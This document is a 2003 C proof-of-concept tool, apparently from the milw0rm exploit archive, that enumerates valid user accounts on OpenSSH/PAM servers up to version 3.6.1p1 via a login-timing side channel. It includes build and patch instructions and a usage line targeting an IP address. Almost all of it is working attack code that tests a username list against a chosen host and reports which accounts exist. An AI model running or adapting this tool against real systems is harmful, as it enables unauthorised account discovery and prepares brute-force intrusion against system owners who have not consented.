OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool

/* * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved * * * Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net> * Proof of concept code by Maurizio Agazzini <inode@mediaservice.net> * * Tested against Red Hat, Mandrake, and Debian GNU/Linux. * * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt * * $ tar xvfz openssh-3.6.1p1.tar.gz * $ patch -p0 <openssh-3.6.1p1_brute.diff * patching file openssh-3.6.1p1/ssh.c * patching file openssh-3.6.1p1/sshconnect.c * patching file openssh-3.6.1p1/sshconnect1.c * patching file openssh-3.6.1p1/sshconnect2.c * $ cd openssh-3.6.1p1 * $ ./configure * $ make * $ cc ../ssh_brute.c -o ssh_brute * $ ./ssh_brute 1 list.txt 192.168.0.66 */ #include <stdio.h> #include <stdlib.h> #include <sys/wait.h> /* an illegal user */ #define NO_USER "not_val_user" /* path of the patched ssh */ #define PATH_SSH "./ssh" /* max time range for invalid user */ #define TIME_RANGE 3 int main(int argc, char *argv[]) { FILE * in; char buffer[2000], username[100], *host; int time_non_valid = 0, time_user = 0; int version = 1, i = 0, ret; fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n"); fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n"); if (argc < 3) { fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]); exit(-1); } version = atoi(argv[1]); host = argv[3]; if ( ( in = fopen(argv[2], "r") ) == NULL ) { fprintf(stderr, "\n Can't open %s\n", argv[2]); exit(-1); } /* test an illegal user */ printf("\n Testing an illegal user\t: "); fflush(stdout); sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host); for (i = 0; i < 3; i++) { ret = system(buffer); time_non_valid += WEXITSTATUS(ret); } time_non_valid /= 3; printf("%d second(s)\n\n", time_non_valid); time_non_valid += TIME_RANGE; /* test supplied users */ fscanf(in, "%s", username); while ( !feof(in) ) { printf(" Testing login %s\t", username); if (strlen(username) <= 8) printf("\t"); printf(": "); fflush( stdout ); sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host); ret = system(buffer); time_user = WEXITSTATUS(ret); if (time_user <= time_non_valid) printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user); else { /* valid user? test it again to be sure */ ret = system(buffer); time_user = WEXITSTATUS(ret); if (time_user <= time_non_valid) printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user); else printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user); } fscanf(in, "%s", username); } fclose(in); printf("\n"); exit(0); } // milw0rm.com [2003-04-30]